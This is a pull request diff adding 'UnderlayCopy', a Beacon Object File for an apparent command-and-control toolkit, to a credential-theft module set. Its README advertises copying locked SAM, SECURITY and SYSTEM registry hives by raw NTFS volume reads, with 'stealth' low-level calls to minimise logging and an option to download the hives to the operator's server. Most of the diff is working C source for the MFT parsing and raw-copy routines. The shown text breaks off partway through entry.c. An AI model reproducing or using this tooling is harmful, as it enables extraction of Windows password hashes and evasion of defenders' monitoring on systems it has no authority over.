### PR TITLE
Add UnderlayCopy to Creds-BOF

### DIFF
--- a/Creds-BOF/Makefile
+++ b/Creds-BOF/Makefile
@@ -8,6 +8,8 @@ bof:
 	@(x86_64-w64-mingw32-gcc -w -c get-netntlm/get-netntlm.c -o _bin/get-netntlm.x64.o -DBOF && x86_64-w64-mingw32-strip --strip-unneeded _bin/get-netntlm.x64.o) && echo '[+] get-netntlm'  || echo '[!] get-netntlm build failed'
 	@(x86_64-w64-mingw32-gcc -w -Wno-int-conversion -Wno-incompatible-pointer-types -Os -c hashdump/hashdump.c -o _bin/hashdump.x64.o -DBOF && x86_64-w64-mingw32-strip --strip-unneeded _bin/hashdump.x64.o)             && echo '[+] hashdump'  || echo '[!] hashdump build failed'
 	@(x86_64-w64-mingw32-gcc -w -Wno-int-conversion -Wno-incompatible-pointer-types -Os -c cookie-monster/cookie-monster-bof.c -o _bin/cookie-monster-bof.x64.o -DBOF && x86_64-w64-mingw32-strip --strip-unneeded _bin/cookie-monster-bof.x64.o) && echo '[+] cookie-monster'  || echo '[!] cookie-monster build failed'
+	@(x86_64-w64-mingw32-gcc -I UnderlayCopy-BOF/_include -Os -masm=intel -c UnderlayCopy-BOF/UnderlayCopyBOF/entry.c -o _bin/underlaycopy.x64.o -DBOF && x86_64-w64-mingw32-strip --strip-unneeded _bin/underlaycopy.x64.o) && echo '[+] underlaycopy x64' || echo '[!] underlaycopy x64'
+	@(i686-w64-mingw32-gcc -I UnderlayCopy-BOF/_include -Os -masm=intel -c UnderlayCopy-BOF/UnderlayCopyBOF/entry.c -o _bin/underlaycopy.x86.o -DBOF && i686-w64-mingw32-strip --strip-unneeded _bin/underlaycopy.x86.o) && echo '[+] underlaycopy x86' || echo '[!] underlaycopy x86'
 	@$(MAKE) --no-print-directory -C nanodump
 	@cp nanodump/dist/*.o _bin/
 

--- a/Creds-BOF/README.md
+++ b/Creds-BOF/README.md
@@ -72,8 +72,15 @@ A flexible tool that creates a minidump of the LSASS process. [More details](htt
 
 
 
+## underlaycopy
+
+A low-level file copy tool that copies files using direct NTFS volume access, bypassing file locks and access restrictions. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/Creds-BOF/UnderlayCopy-BOF/README.md)
+
+
+
 ## Credits
 * C2-Tool-Collection - https://github.com/outflanknl/C2-Tool-Collection
 * PrivCheck - https://github.com/ostrichgolf/PrivCheck
 * nanodump - https://github.com/fortra/nanodump
 * Get-NetNTLM - https://github.com/KingOfTheNOPs/Get-NetNTLM
+* UnderlayCopy-BOF - https://github.com/shashinma/UnderlayCopy-BOF

--- a/Creds-BOF/UnderlayCopy-BOF/README.md
+++ b/Creds-BOF/UnderlayCopy-BOF/README.md
@@ -1,0 +1,73 @@
+# UnderlayCopy-BOF
+> #### Developed for [@Adaptix-Framework](https://github.com/Adaptix-Framework)
+<br>
+
+A low-level file copy tool ported to BOF format. Copies files using direct NTFS volume access, bypassing file locks and access restrictions:
+- Copy locked files (SAM, SECURITY, SYSTEM registry hives)
+- Two copy modes: MFT (Master File Table) and Metadata (FSCTL_GET_RETRIEVAL_POINTERS)
+- Direct volume access using NtCreateFile/NtReadFile/NtWriteFile (stealth mode)
+- Support for sparse files and data runs
+- Save to disk or download to server
+- Automatic filename generation for downloads (HOSTNAME_FILENAME.hive format)
+
+```
+underlaycopy <mode> <source> [-w destination] [--download]
+```
+
+#### Arguments:
+- `mode`: Copy mode - `MFT` or `Metadata`
+  - `MFT`: Reads file data directly from MFT records and data runs. Best for locked files (SAM, SECURITY, SYSTEM)
+  - `Metadata`: Uses FSCTL_GET_RETRIEVAL_POINTERS to get file extents. Faster but may fail on locked files
+- `source`: Source file path to copy (e.g., `C:\Windows\System32\config\SAM`)
+- `-w destination`: Destination file path (required if `--download` is not used)
+- `--download`: Download file to server instead of saving to disk. File will be saved as `HOSTNAME_FILENAME.hive` on the server
+
+#### Features:
+- **Bypass file locks**: Copy files that are locked by the system (registry hives, active processes)
+- **Stealth mode**: Uses low-level NTFS APIs (NtCreateFile, NtReadFile, NtWriteFile) to minimize logging
+- **Sparse file support**: Handles sparse clusters correctly (writes zeros for sparse regions)
+- **Two copy modes**: 
+  - MFT mode: Direct MFT record parsing - works on locked files
+  - Metadata mode: Uses Windows API for extent retrieval - faster but requires file handle
+- **Memory-efficient**: Uses 64KB buffers for I/O operations
+- **Secure cleanup**: Clears sensitive data from memory after operations
+
+#### Examples:
+```
+# Copy locked SAM registry hive using MFT mode (recommended for locked files)
+underlaycopy MFT C:\Windows\System32\config\SAM -w C:\temp\SAM_copy
+
+# Copy file using Metadata mode (faster for unlocked files)
+underlaycopy Metadata C:\Windows\System32\notepad.exe -w C:\temp\notepad_copy.exe
+
+# Download locked SECURITY hive to server (saved as HOSTNAME_SECURITY.hive)
+underlaycopy MFT C:\Windows\System32\config\SECURITY --download
+
+# Download SYSTEM hive with custom filename
+underlaycopy MFT C:\Windows\System32\config\SYSTEM --download -w SYSTEM_backup
+```
+
+#### Technical Details:
+- **MFT Mode**: 
+  - Reads NTFS boot sector to locate MFT
+  - Gets file MFT record number from GetFileInformationByHandle
+  - Parses MFT record to extract $DATA attribute
+  - Reads data runs and copies clusters directly from volume
+  - Handles resident data (small files stored in MFT) and non-resident data (data runs)
+  
+- **Metadata Mode**:
+  - Opens source file with FILE_FLAG_BACKUP_SEMANTICS
+  - Uses FSCTL_GET_RETRIEVAL_POINTERS to get file extents
+  - Copies data directly from volume using extent LCNs (Logical Cluster Numbers)
+  - May fail on locked files that cannot be opened
+
+- **Volume Access**:
+  - Opens volume using NtCreateFile with \??\C: path
+  - Reads directly from disk sectors using NtReadFile
+  - Bypasses file system locks and access checks
+
+#### Use Cases:
+- Extracting locked registry hives (SAM, SECURITY, SYSTEM) for offline analysis
+- Copying files locked by active processes
+- Stealth file operations without triggering file system logging
+- Bypassing access restrictions on system files

--- a/Creds-BOF/UnderlayCopy-BOF/UnderlayCopyBOF/entry.c
+++ b/Creds-BOF/UnderlayCopy-BOF/UnderlayCopyBOF/entry.c
@@ -1,0 +1,1312 @@
+#include <windows.h>
+#include <stdint.h>
+#include "../_include/beacon.h"
+#include "../_include/bofdefs.h"
+#include "../_include/adaptix.h"
+#include "underlaycopy.h"
+
+// Helper function to normalize path for CreateFileW (\\?\ prefix)
+BOOL NormalizePathForCreateFileW(LPCWSTR path, WCHAR* normalizedPath, int bufferSize) {
+    if (!path || !normalizedPath || bufferSize < 5) {
+        return FALSE;
+    }
+    
+    int pathLen = KERNEL32$lstrlenW(path);
+    if (pathLen == 0 || pathLen >= bufferSize - 4) {
+        return FALSE;
+    }
+    
+    // Check if already has \\?\ prefix
+    if (path[0] == L'\\' && path[1] == L'\\' && path[2] == L'?' && path[3] == L'\\') {
+        MSVCRT$memcpy(normalizedPath, path, (pathLen + 1) * sizeof(WCHAR));
+    } else {
+        normalizedPath[0] = L'\\';
+        normalizedPath[1] = L'\\';
+        normalizedPath[2] = L'?';
+        normalizedPath[3] = L'\\';
+        MSVCRT$memcpy(normalizedPath + 4, path, (pathLen + 1) * sizeof(WCHAR));
+    }
+    
+    return TRUE;
+}
+
+// Helper function to normalize path for NtCreateFile (\??\ prefix)
+BOOL NormalizePathForNtCreateFile(LPCWSTR path, WCHAR* normalizedPath, int bufferSize) {
+    if (!path || !normalizedPath || bufferSize < 5) {
+        return FALSE;
+    }
+    
+    WCHAR fullDestPath[MAX_PATH * 2];
+    WCHAR* filePart = NULL;
+    DWORD fullPathLen = KERNEL32$GetFullPathNameW(path, MAX_PATH * 2, fullDestPath, &filePart);
+    
+    if (fullPathLen == 0 || fullPathLen >= MAX_PATH * 2) {
+        fullPathLen = KERNEL32$lstrlenW(path);
+        if (fullPathLen >= bufferSize - 4) {
+            return FALSE;
+        }
+        MSVCRT$memcpy(fullDestPath, path, (fullPathLen + 1) * sizeof(WCHAR));
+    }
+    
+    // Check if already has \??\ or \\?\ prefix
+    if ((fullDestPath[0] == L'\\' && fullDestPath[1] == L'\\' && fullDestPath[2] == L'?' && fullDestPath[3] == L'\\') ||
+        (fullDestPath[0] == L'\\' && fullDestPath[1] == L'?' && fullDestPath[2] == L'?' && fullDestPath[3] == L'\\')) {
+        // Already normalized, but convert \\?\ to \??\ if needed
+        if (fullDestPath[1] == L'\\') {
+            normalizedPath[0] = L'\\';
+            normalizedPath[1] = L'?';
+            normalizedPath[2] = L'?';
+            normalizedPath[3] = L'\\';
+            MSVCRT$memcpy(normalizedPath + 4, fullDestPath + 4, (fullPathLen - 3) * sizeof(WCHAR));
+        } else {
+            if (fullPathLen >= bufferSize) {
+                return FALSE;
+            }
+            MSVCRT$memcpy(normalizedPath, fullDestPath, (fullPathLen + 1) * sizeof(WCHAR));
+        }
+    } else {
+        // Add \??\ prefix
+        if (fullPathLen >= bufferSize - 4) {
+            return FALSE;
+        }
+        normalizedPath[0] = L'\\';
+        normalizedPath[1] = L'?';
+        normalizedPath[2] = L'?';
+        normalizedPath[3] = L'\\';
+        MSVCRT$memcpy(normalizedPath + 4, fullDestPath, (fullPathLen + 1) * sizeof(WCHAR));
+    }
+    
+    return TRUE;
+}
+
+// Helper function to create output file using NtCreateFile
+BOOL CreateOutputFileNt(LPCWSTR destPath, HANDLE* hOutput) {
+    WCHAR normalizedDestPath[MAX_PATH * 2];
+    OBJECT_ATTRIBUTES objAttr;
+    UNICODE_STRING outputPath;
+    IO_STATUS_BLOCK ioStatus;
+    NTSTATUS status;
+    
+    if (!NormalizePathForNtCreateFile(destPath, normalizedDestPath, MAX_PATH * 2)) {
+        return FALSE;
+    }
+    
+    NTDLL$RtlInitUnicodeString(&outputPath, normalizedDestPath);
+    
+    objAttr.Length = sizeof(OBJECT_ATTRIBUTES);
+    objAttr.RootDirectory = NULL;
+    objAttr.ObjectName = &outputPath;
+    objAttr.Attributes = OBJ_CASE_INSENSITIVE;
+    objAttr.SecurityDescriptor = NULL;
+    objAttr.SecurityQualityOfService = NULL;
+    
+    status = NTDLL$NtCreateFile(
+        hOutput,
+        FILE_WRITE_DATA | SYNCHRONIZE,
+        &objAttr,
+        &ioStatus,
+        NULL,
+        FILE_ATTRIBUTE_NORMAL,
+        0,
+        FILE_OVERWRITE_IF,
+        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
+        NULL,
+        0
+    );
+    
+    return NT_SUCCESS(status);
+}
+
+// Common I/O functions to reduce code duplication
+
+// Write sparse data to file
+BOOL WriteSparseToFile(HANDLE hOutput, ULONGLONG offset, ULONGLONG size, BYTE* tempBuffer) {
+    IO_STATUS_BLOCK ioStatus;
+    NTSTATUS status;
+    
+    MSVCRT$memset(tempBuffer, 0, (size_t)size);
+    
+    LARGE_INTEGER writeOffset;
+    writeOffset.QuadPart = offset;
+    
+    status = NTDLL$NtWriteFile(
+        hOutput,
+        NULL,
+        NULL,
+        NULL,
+        &ioStatus,
+        tempBuffer,
+        (ULONG)size,
+        &writeOffset,
+        NULL
+    );
+    
+    if (!NT_SUCCESS(status)) {
+        return FALSE;
+    }
+    
+    // Note: bytesWritten is updated in caller using size parameter
+    return TRUE;
+}
+
+// Write sparse data to memory
+void WriteSparseToMemory(BYTE* destBuffer, ULONGLONG offset, ULONGLONG size) {
+    MSVCRT$memset(destBuffer + offset, 0, (size_t)size);
+}
+
+// Copy chunk from volume to file
+BOOL CopyChunkToFile(HANDLE hVolume, HANDLE hOutput, ULONGLONG diskOffset, ULONGLONG toCopy, ULONGLONG writeOffset, BYTE* buffer, DWORD bufferSize, ULONGLONG* bytesWritten) {
+    IO_STATUS_BLOCK ioStatus;
+    NTSTATUS status;
+    ULONGLONG copied = 0;
+    
+    *bytesWritten = 0;
+    
+    while (copied < toCopy) {
+        ULONG chunkSize = (ULONG)((toCopy - copied > bufferSize) ? bufferSize : (toCopy - copied));
+        
+        LARGE_INTEGER readOffset;
+        readOffset.QuadPart = diskOffset + copied;
+        
+        status = NTDLL$NtReadFile(
+            hVolume,
+            NULL,
+            NULL,
+            NULL,
+            &ioStatus,
+            buffer,
+            chunkSize,
+            &readOffset,
+            NULL
+        );
+        
+        if (!NT_SUCCESS(status)) {
+            return FALSE;
+        }
+        
+        if (ioStatus.Information == 0) {
+            return FALSE;
+        }
+        
+        LARGE_INTEGER writeOffsetLarge;
+        writeOffsetLarge.QuadPart = writeOffset + copied;
+        
+        status = NTDLL$NtWriteFile(
+            hOutput,
+            NULL,
+            NULL,
+            NULL,
+            &ioStatus,
+            buffer,
+            (ULONG)ioStatus.Information,
+            &writeOffsetLarge,
+            NULL
+        );
+        
+        if (!NT_SUCCESS(status)) {
+            return FALSE;
+        }
+        
+        copied += ioStatus.Information;
+        MSVCRT$memset(buffer, 0, bufferSize);
+    }
+    
+    *bytesWritten = copied;
+    return TRUE;
+}
+
+// Copy chunk from volume to memory
+BOOL CopyChunkToMemory(HANDLE hVolume, BYTE* destBuffer, ULONGLONG destOffset, ULONGLONG diskOffset, ULONGLONG toCopy, BYTE* readBuffer, DWORD bufferSize, ULONGLONG* bytesCopied) {
+    IO_STATUS_BLOCK ioStatus;
+    NTSTATUS status;
+    ULONGLONG copied = 0;
+    
+    *bytesCopied = 0;
+    
+    while (copied < toCopy) {
+        ULONG chunkSize = (ULONG)((toCopy - copied > bufferSize) ? bufferSize : (toCopy - copied));
+        
+        LARGE_INTEGER readOffset;
+        readOffset.QuadPart = diskOffset + copied;
+        
+        status = NTDLL$NtReadFile(
+            hVolume,
+            NULL,
+            NULL,
+            NULL,
+            &ioStatus,
+            readBuffer,
+            chunkSize,
+            &readOffset,
+            NULL
+        );
+        
+        if (!NT_SUCCESS(status)) {
+            return FALSE;
+        }
+        
+        if (ioStatus.Information == 0) {
+            return FALSE;
+        }
+        
+        MSVCRT$memcpy(destBuffer + destOffset + copied, readBuffer, (size_t)ioStatus.Information);
+        copied += ioStatus.Information;
+        MSVCRT$memset(readBuffer, 0, bufferSize);
+    }
+    
+    *bytesCopied = copied;
+    return TRUE;
+}
+
+// Copy file by extents directly to memory buffer (for Metadata mode download)
+BOOL CopyFileByExtentsToMemory(HANDLE hVolume, EXTENT* extents, DWORD extentCount, ULONGLONG clusterSize, ULONGLONG fileSize, BYTE** outputBuffer, ULONGLONG* outputSize) {
+    ULONGLONG bytesCopied = 0;
+    BYTE* readBuffer = NULL;
+    DWORD bufferSize = 64 * 1024;
+    IO_STATUS_BLOCK ioStatus;
+    NTSTATUS status;
+    
+    *outputBuffer = NULL;
+    *outputSize = 0;
+    
+    if (fileSize > 0x7FFFFFFF) {
+        return FALSE; // File too large
+    }
+    
+    BYTE* tempBuffer = (BYTE*)intAlloc((SIZE_T)fileSize);
+    if (!tempBuffer) {
+        return FALSE;
+    }
+    
+    readBuffer = (BYTE*)intAlloc(bufferSize);
+    if (!readBuffer) {
+        intFree(tempBuffer);
+        return FALSE;
+    }
+    
+    for (DWORD i = 0; i < extentCount; i++) {
+        ULONGLONG extentBytes = extents[i].lengthClusters * clusterSize;
+        ULONGLONG remaining = fileSize - bytesCopied;
+        ULONGLONG toCopy = (extentBytes > remaining) ? remaining : extentBytes;
+        
+        if (toCopy == 0) break;
+        
+        // Check for sparse extent (LCN = -1)
+        if (extents[i].lcn == (ULONGLONG)-1) {
+            WriteSparseToMemory(tempBuffer, bytesCopied, toCopy);
+            bytesCopied += toCopy;
+            continue;
+        }
+        
+        ULONGLONG diskOffset = extents[i].lcn * clusterSize;
+        ULONGLONG copied = 0;
+        
+        if (!CopyChunkToMemory(hVolume, tempBuffer, bytesCopied, diskOffset, toCopy, readBuffer, bufferSize, &copied)) {
+            if (bytesCopied >= fileSize) {
+                break;
+            }
+            intFree(readBuffer);
+            intFree(tempBuffer);
+            return FALSE;
+        }
+        
+        bytesCopied += copied;
+        if (bytesCopied >= fileSize) break;
+    }
+    
+    MSVCRT$memset(readBuffer, 0, bufferSize);
+    intFree(readBuffer);
+    
+    if (bytesCopied != fileSize) {
+        intFree(tempBuffer);
+        return FALSE;
+    }
+    
+    *outputBuffer = tempBuffer;
+    *outputSize = bytesCopied;
+    return TRUE;
+}
+
+// Helper function to read NTFS boot sector (stealth mode - no logging)
+BOOL ReadNtfsBoot(HANDLE hVolume, NTFS_BOOT* boot) {
+    BYTE buffer[512];
+    IO_STATUS_BLOCK ioStatus;
+    LARGE_INTEGER offset;
+    NTSTATUS status;
+    offset.QuadPart = 0;
+
+    // Use direct NtReadFile for stealth
+    status = NTDLL$NtReadFile(
+        hVolume,
+        NULL,
+        NULL,
+        NULL,
+        &ioStatus,
+        buffer,
+        512,
+        &offset,
+        NULL
+    );
+
+    if (!NT_SUCCESS(status) || ioStatus.Information != 512) {
+        return FALSE;
+    }
+
+    boot->bytesPerSector = *(WORD*)(buffer + BOOT_BYTES_PER_SECTOR);
+    boot->sectorsPerCluster = buffer[BOOT_SECTORS_PER_CLUSTER];
+    boot->clusterSize = boot->bytesPerSector * boot->sectorsPerCluster;
+    boot->mftCluster = *(ULONGLONG*)(buffer + BOOT_MFT_CLUSTER);
+
+    // Clear buffer from memory
+    MSVCRT$memset(buffer, 0, sizeof(buffer));
+
+    return TRUE;
+}
+
+// Get file information using GetFileInformationByHandle
+BOOL GetNtfsFileInfo(LPCWSTR filePath, ULONGLONG* mftRecordNumber, ULONGLONG* fileSize) {
+    HANDLE hFile = INVALID_HANDLE_VALUE;
+    BY_HANDLE_FILE_INFORMATION fileInfo;
+    WCHAR normalizedPath[MAX_PATH * 2];
+
+    if (!NormalizePathForCreateFileW(filePath, normalizedPath, MAX_PATH * 2)) {
+        return FALSE;
+    }
+
+    hFile = KERNEL32$CreateFileW(
+        normalizedPath,
+        FILE_READ_ATTRIBUTES,
+        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+        NULL,
+        OPEN_EXISTING,
+        FILE_FLAG_BACKUP_SEMANTICS,
+        NULL
+    );
+
+    if (hFile == INVALID_HANDLE_VALUE) {
+        return FALSE;
+    }
+
+    if (!KERNEL32$GetFileInformationByHandle(hFile, &fileInfo)) {
+        KERNEL32$CloseHandle(hFile);
+        return FALSE;
+    }
+
+    // Extract MFT record number from FileIndex
+    ULONGLONG frn = ((ULONGLONG)fileInfo.nFileIndexHigh << 32) | fileInfo.nFileIndexLow;
+    *mftRecordNumber = frn & 0x0000FFFFFFFFFFFF;
+    *fileSize = ((ULONGLONG)fileInfo.nFileSizeHigh << 32) | fileInfo.nFileSizeLow;
+
+    KERNEL32$CloseHandle(hFile);
+    return TRUE;
+}
+
+// Read MFT record (using direct NtReadFile for stealth)
+BOOL ReadMftRecord(HANDLE hVolume, NTFS_BOOT* boot, ULONGLONG recordNumber, BYTE* record) {
+    ULONGLONG mftOffset = boot->mftCluster * boot->clusterSize;
+    ULONGLONG recordOffset = mftOffset + (recordNumber * MFT_RECORD_SIZE);
+    LARGE_INTEGER offset;
+    IO_STATUS_BLOCK ioStatus;
+    NTSTATUS status;
+
+    offset.QuadPart = recordOffset;
+
+    // Use direct NtReadFile for stealth
+    status = NTDLL$NtReadFile(
+        hVolume,
+        NULL,
+        NULL,
+        NULL,
+        &ioStatus,
+        record,
+        MFT_RECORD_SIZE,
+        &offset,
+        NULL
+    );
+
+    if (!NT_SUCCESS(status) || ioStatus.Information != MFT_RECORD_SIZE) {
+        return FALSE;
+    }
+
+    return TRUE;
+}
+
+// Parse data runs from $DATA attribute
+int ParseDataRuns(BYTE* dataRuns, int dataRunsSize, DATA_RUN** runs, NTFS_BOOT* boot) {
+    int pos = 0;
+    ULONGLONG currentLCN = 0;
+    int runCount = 0;
+    DATA_RUN* runArray = NULL;
+    int arraySize = 0;
+
+    while (pos < dataRunsSize && dataRuns[pos] != 0x00) {
+        BYTE header = dataRuns[pos++];
+        BYTE lenSize = header & 0x0F;
+        BYTE offSize = (header >> 4) & 0x0F;
+
+        if (lenSize == 0 || lenSize > 8 || offSize > 8) {
+            break;
+        }
+
+        // Read length
+        ULONGLONG length = 0;
+        int i;
+        for (i = 0; i < lenSize; i++) {
+            length |= ((ULONGLONG)dataRuns[pos++]) << (8 * i);
+        }
+
+        // Read offset (relative LCN)
+        ULONGLONG offset = 0;
+        BOOL isSparse = (offSize == 0);
+        
+        if (offSize > 0) {
+            for (i = 0; i < offSize; i++) {
+                offset |= ((ULONGLONG)dataRuns[pos++]) << (8 * i);
+            }
+            // Two's complement sign extension
+            if (offSize < 8 && (dataRuns[pos - 1] & 0x80)) {
+                ULONGLONG signExtend = ((ULONGLONG)0xFFFFFFFFFFFFFFFF) << (8 * offSize);
+                offset |= signExtend;
+            }
+            currentLCN += offset;
+        }
+        // If offSize == 0, this is a sparse cluster - don't update currentLCN
+
+        // Reallocate array if needed
+        if (runCount >= arraySize) {
+            arraySize = arraySize == 0 ? 16 : arraySize * 2;
+            DATA_RUN* newArray = (DATA_RUN*)intAlloc(sizeof(DATA_RUN) * arraySize);
+            if (runArray) {
+                MSVCRT$memcpy(newArray, runArray, sizeof(DATA_RUN) * runCount);
+                intFree(runArray);
+            }
+            runArray = newArray;
+        }
+
+        // For sparse clusters (offSize == 0), set LCN to 0 to mark as sparse
+        runArray[runCount].lcn = isSparse ? 0 : currentLCN;
+        runArray[runCount].length = length;
+        runCount++;
+    }
+
+    *runs = runArray;
+    return runCount;
+}
+
+// Get file info from MFT record
+BOOL GetFileInfoFromRecord(BYTE* record, FILE_INFO* fileInfo, NTFS_BOOT* boot) {
+    WORD attrOffset = *(WORD*)(record + 20);
+    fileInfo->hasRuns = FALSE;
+    fileInfo->isResident = FALSE;
+    fileInfo->runs = NULL;
+    fileInfo->runCount = 0;
+    fileInfo->residentData = NULL;
+    fileInfo->residentDataSize = 0;
+
+    while (attrOffset < MFT_RECORD_SIZE) {
+        DWORD attrType = *(DWORD*)(record + attrOffset);
+        if (attrType == ATTRIBUTE_END) {
+            break;
+        }
+
+        DWORD attrLength = *(DWORD*)(record + attrOffset + 4);
+        if (attrLength == 0 || attrOffset + attrLength > MFT_RECORD_SIZE) {
+            break;
+        }
+
+        BYTE nonResident = record[attrOffset + 8];
+
+        // Handle $DATA attribute
+        if (attrType == ATTRIBUTE_DATA) {
+            if (nonResident == 0) {
+                // Resident data
+                fileInfo->isResident = TRUE;
+                fileInfo->fileSize = *(ULONGLONG*)(record + attrOffset + 16);
+                WORD valueOffset = *(WORD*)(record + attrOffset + 20);
+                fileInfo->residentDataSize = (DWORD)fileInfo->fileSize;
+                fileInfo->residentData = (BYTE*)intAlloc(fileInfo->residentDataSize);
+                MSVCRT$memcpy(fileInfo->residentData, record + attrOffset + valueOffset, fileInfo->residentDataSize);
+            } else {
+                // Non-resident data
+                fileInfo->isResident = FALSE;
+                fileInfo->fileSize = *(ULONGLONG*)(record + attrOffset + 48);
+                WORD dataRunsOffset = *(WORD*)(record + attrOffset + 32);
+                int dataRunsSize = attrLength - dataRunsOffset;
+                BYTE* dataRuns = record + attrOffset + dataRunsOffset;
+
+                fileInfo->runCount = ParseDataRuns(dataRuns, dataRunsSize, &fileInfo->runs, boot);
+                fileInfo->hasRuns = (fileInfo->runCount > 0);
+            }
+            break;
+        }
+
+        attrOffset += attrLength;
+    }
+
+    return TRUE;
+}
+
+// Copy file by extents (MFT mode) - stealth implementation
+BOOL CopyFileByMft(HANDLE hVolume, HANDLE hOutput, FILE_INFO* fileInfo, NTFS_BOOT* boot) {
+    ULONGLONG bytesWritten = 0;
+    BYTE* buffer = NULL;
+    DWORD bufferSize = 64 * 1024; // 64KB buffer for stealth (smaller = less memory footprint)
+    IO_STATUS_BLOCK ioStatus;
+    NTSTATUS status;
+
+    buffer = (BYTE*)intAlloc(bufferSize);
+    if (!buffer) {
+        return FALSE;
+    }
+
+    if (fileInfo->isResident) {
+        // Copy resident data using NtWriteFile for stealth
+        LARGE_INTEGER writeOffset;
+        writeOffset.QuadPart = 0;
+        status = NTDLL$NtWriteFile(
+            hOutput,
+            NULL,
+            NULL,
+            NULL,
+            &ioStatus,
+            fileInfo->residentData,
+            fileInfo->residentDataSize,
+            &writeOffset,
+            NULL
+        );
+        if (!NT_SUCCESS(status)) {
+            intFree(buffer);
+            return FALSE;
+        }
+        bytesWritten = ioStatus.Information;
+    } else if (fileInfo->hasRuns) {
+        // Copy non-resident data
+        int i;
+        for (i = 0; i < fileInfo->runCount; i++) {
+            ULONGLONG toRead = fileInfo->runs[i].length * boot->clusterSize;
+            ULONGLONG remaining = fileInfo->fileSize - bytesWritten;
+            if (toRead > remaining) {
+                toRead = remaining;
+            }
+            if (toRead == 0) {
+                break;
+            }
+
+            if (fileInfo->runs[i].lcn == 0) {
+                // Sparse cluster - write zeros
+                if (!WriteSparseToFile(hOutput, bytesWritten, toRead, buffer)) {
+                    intFree(buffer);
+                    return FALSE;
+                }
+                bytesWritten += toRead;
+                continue;
+            }
+
+            ULONGLONG diskOffset = fileInfo->runs[i].lcn * boot->clusterSize;
+            ULONGLONG copied = 0;
+            
+            if (!CopyChunkToFile(hVolume, hOutput, diskOffset, toRead, bytesWritten, buffer, bufferSize, &copied)) {
+                // If we've copied some data and reached file size, it's OK
+                if (bytesWritten >= fileInfo->fileSize) {
+                    break;
+                }
+                intFree(buffer);
+                return FALSE;
+            }
+            
+            bytesWritten += copied;
+
+            if (bytesWritten >= fileInfo->fileSize) {
+                break;
+            }
+        }
+    }
+
+    // Clear buffer before freeing
+    MSVCRT$memset(buffer, 0, bufferSize);
+    intFree(buffer);
+    
+    // Verify that we copied the complete file
+    if (bytesWritten != fileInfo->fileSize) {
+        return FALSE;
+    }
+    
+    return TRUE;
+}
+
+// Get file extents using FSCTL_GET_RETRIEVAL_POINTERS (Metadata mode)
+int GetFileExtents(HANDLE hFile, EXTENT** extents, DWORD* extentCount) {
+    DWORD bytesReturned = 0;
+    DWORD bufferSize = 4096;
+    BYTE* buffer = NULL;
+    STARTING_VCN_INPUT_BUFFER inputBuffer = {0};
+    PRETRIEVAL_POINTERS_BUFFER outputBuffer = NULL;
+    EXTENT* extentArray = NULL;
+    int result = 0;
+    
+    inputBuffer.StartingVcn.QuadPart = 0;
+    
+    // Allocate buffer for retrieval pointers
+    buffer = (BYTE*)intAlloc(bufferSize);
+    if (!buffer) {
+        return 0;
+    }
+    
+    // First call to get required buffer size
+    if (!KERNEL32$DeviceIoControl(
+        hFile,
+        FSCTL_GET_RETRIEVAL_POINTERS,
+        &inputBuffer,
+        sizeof(inputBuffer),
+        buffer,
+        bufferSize,
+        &bytesReturned,
+        NULL
+    )) {
+        DWORD error = KERNEL32$GetLastError();
+        if (error == ERROR_MORE_DATA) {
+            // Need larger buffer
+            intFree(buffer);
+            bufferSize = bytesReturned;
+            buffer = (BYTE*)intAlloc(bufferSize);
+            if (!buffer) {
+                return 0;
+            }
+            
+            // Retry with larger buffer
+            if (!KERNEL32$DeviceIoControl(
+                hFile,
+                FSCTL_GET_RETRIEVAL_POINTERS,
+                &inputBuffer,
+                sizeof(inputBuffer),
+                buffer,
+                bufferSize,
+                &bytesReturned,
+                NULL
+            )) {
+                intFree(buffer);
+                return 0;
+            }
+        } else {
+            intFree(buffer);
+            return 0;
+        }
+    }
+    
+    outputBuffer = (PRETRIEVAL_POINTERS_BUFFER)buffer;
+    
+    // Allocate extent array
+    extentArray = (EXTENT*)intAlloc(sizeof(EXTENT) * outputBuffer->ExtentCount);
+    if (!extentArray) {
+        intFree(buffer);
+        return 0;
+    }
+    
+    // Parse extents
+    for (DWORD i = 0; i < outputBuffer->ExtentCount; i++) {
+        LARGE_INTEGER nextVcn = outputBuffer->Extents[i].NextVcn;
+        LARGE_INTEGER lcn = outputBuffer->Extents[i].Lcn;
+        LARGE_INTEGER currentVcn = (i == 0) ? outputBuffer->StartingVcn : outputBuffer->Extents[i-1].NextVcn;
+        
+        extentArray[i].lcn = lcn.QuadPart;
+        extentArray[i].lengthClusters = nextVcn.QuadPart - currentVcn.QuadPart;
+    }
+    
+    *extents = extentArray;
+    *extentCount = outputBuffer->ExtentCount;
+    result = outputBuffer->ExtentCount;
+    
+    intFree(buffer);
+    return result;
+}
+
+// Copy file by extents (Metadata mode) - stealth implementation
+BOOL CopyFileByExtents(HANDLE hVolume, HANDLE hOutput, EXTENT* extents, DWORD extentCount, ULONGLONG clusterSize, ULONGLONG fileSize) {
+    ULONGLONG bytesWritten = 0;
+    BYTE* buffer = NULL;
+    DWORD bufferSize = 64 * 1024; // 64KB buffer
+    IO_STATUS_BLOCK ioStatus;
+    NTSTATUS status;
+    
+    buffer = (BYTE*)intAlloc(bufferSize);
+    if (!buffer) {
+        return FALSE;
+    }
+    
+    for (DWORD i = 0; i < extentCount; i++) {
+        ULONGLONG extentBytes = extents[i].lengthClusters * clusterSize;
+        ULONGLONG remaining = fileSize - bytesWritten;
+        ULONGLONG toCopy = (extentBytes > remaining) ? remaining : extentBytes;
+        
+        if (toCopy == 0) {
+            break;
+        }
+        
+        // Check for sparse extent (LCN = -1 indicates sparse cluster in FSCTL_GET_RETRIEVAL_POINTERS)
+        // Note: LCN = 0 is a valid cluster (boot sector), so we only check for -1
+        if (extents[i].lcn == (ULONGLONG)-1) {
+            // Sparse extent - write zeros
+            if (!WriteSparseToFile(hOutput, bytesWritten, toCopy, buffer)) {
+                intFree(buffer);
+                return FALSE;
+            }
+            bytesWritten += toCopy;
+            continue;
+        }
+        
+        ULONGLONG diskOffset = extents[i].lcn * clusterSize;
+        ULONGLONG copied = 0;
+        
+        if (!CopyChunkToFile(hVolume, hOutput, diskOffset, toCopy, bytesWritten, buffer, bufferSize, &copied)) {
+            // If we've copied some data and reached file size, it's OK
+            if (bytesWritten >= fileSize) {
+                break;
+            }
+            intFree(buffer);
+            return FALSE;
+        }
+        
+        bytesWritten += copied;
+        
+        if (bytesWritten >= fileSize) {
+            break;
+        }
+    }
+    
+    // Clear buffer before freeing
